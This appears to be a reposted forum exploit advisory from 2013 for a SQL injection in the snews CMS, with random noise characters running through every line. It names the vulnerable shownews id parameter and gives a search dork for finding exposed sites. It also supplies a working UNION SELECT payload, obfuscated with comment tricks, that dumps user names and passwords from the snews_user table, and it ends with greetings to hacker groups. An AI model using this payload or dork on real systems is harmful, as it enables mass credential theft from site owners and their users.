标题: CMS snews SQL Injection Vulnerability
# V5 V& R( {- L1 e9 b7 D作者: By onestree
) v7 x. C3 `# L1 V7 v; p* Q, V( T下载地址 : http://snewscms.com/
9 k5 i0 I# h; L% _9 e测试平台 : ubuntu 12.10 / win 7
! y3 a# a% W( S/ o. H1 e$ K关键词: inurl:"tanyakan pada rumput yang bergoyang"; g) c4 [7 X6 l% W# A
6 F* M( ~2 e- _4 ~) |( U( Q0 W+ |
) p1 K: E3 X7 J: {. h" b
*************************************************************
( l8 V: d9 D+ F% r/ g ' T7 V$ {5 E) E& q) ~
SQL poc:
; p" H$ F9 R2 T3 e6 U7 d1 x* E
# W# @( Y& L% C7 e9 Bhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
% g" d# b2 A2 F( N$ `
+ N5 x7 O; W+ T/ l示例
% D" r; \( y p( A! y& a
: G# z0 F! ?: V. vhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*% P' _7 Q/ T$ W7 a) k& a0 U: y! w
/ | r4 M s; n2 e6 P7 q
, U. K7 N" r' R) h4 f) Y" I致谢:
. A6 @/ I4 k) _4 ~' ?4 v . |( z, M- X/ W: c2 N( n
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
$ N) {. k6 K5 A3 C( E% T9 b2 z , Z, u4 D# X# S' O4 v, s0 k
indonesiancoder - moeslimh4x0r - go-coder
- E- N1 F4 j- D5 t8 C2 J" ~5 U
7 h* d1 i- K" Y' W Dspesial my hunny :*
% \1 ]/ K% r) X8 {3 B |
发表于 2013-1-23 08:55:06
收藏
支持
反对